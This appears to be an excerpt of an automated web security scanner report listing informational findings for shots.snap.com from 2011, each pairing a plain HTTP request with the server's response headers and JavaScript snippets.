GET /asj/v1/6e8afd4f63cd Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:21:21 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 Cache-Control: max-age=7200 Expires: Tue, 26 Apr 2011 03:21:21 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 199 if (typeof SNAP_COM == "undefined") { SNAP_COM = {}; } SNAP_COM.autoshot = {"Results":{"Matches" }} ; if (SNAP_COM.shot && SNAP_COM.shot.autoshot |
Severity: | Information |
Confidence: | Firm |
Host: | http://shots.snap.com |
Path: | /asj/v1/spakey/1797024321 |
GET /asj/v1/spakey/1797024321 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.snap.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:47:22 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 Cache-Control: max-age=7200 Expires: Tue, 26 Apr 2011 03:47:22 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 55 if (typeof SNAP_COM == "undefined") { SNAP_COM = {}; } |
Severity: | Information |
Confidence: | Firm |
Host: | http://shots.snap.com |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: user=id%3D1626613240 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 17:30:37 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 Last-Modified: Fri, 04 May 2007 00:08:54 GMT ETag: "13e-42f99c1c11180" Accept-Ranges: bytes Vary: Accept-Encoding,User Content-Type: text/plain; charset=UTF-8 Content-Length: 318 ..............(.......(.. ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://shots.snap.com |
Path: | /snap_shots.js |
GET /snap_shots.js?ap=1&si=0 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 01:21:04 GMT Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17 X-Powered-By: PHP/5.2.17 P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA" Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:21:03 GMT; path=/; domain=.snap.com Set-Cookie: user=id%3D97db340396 Set-Cookie: user=id%3D97db340396 Cache-Control: max-age=7200 Expires: Tue, 26 Apr 2011 03:21:04 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 15220 //<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]... |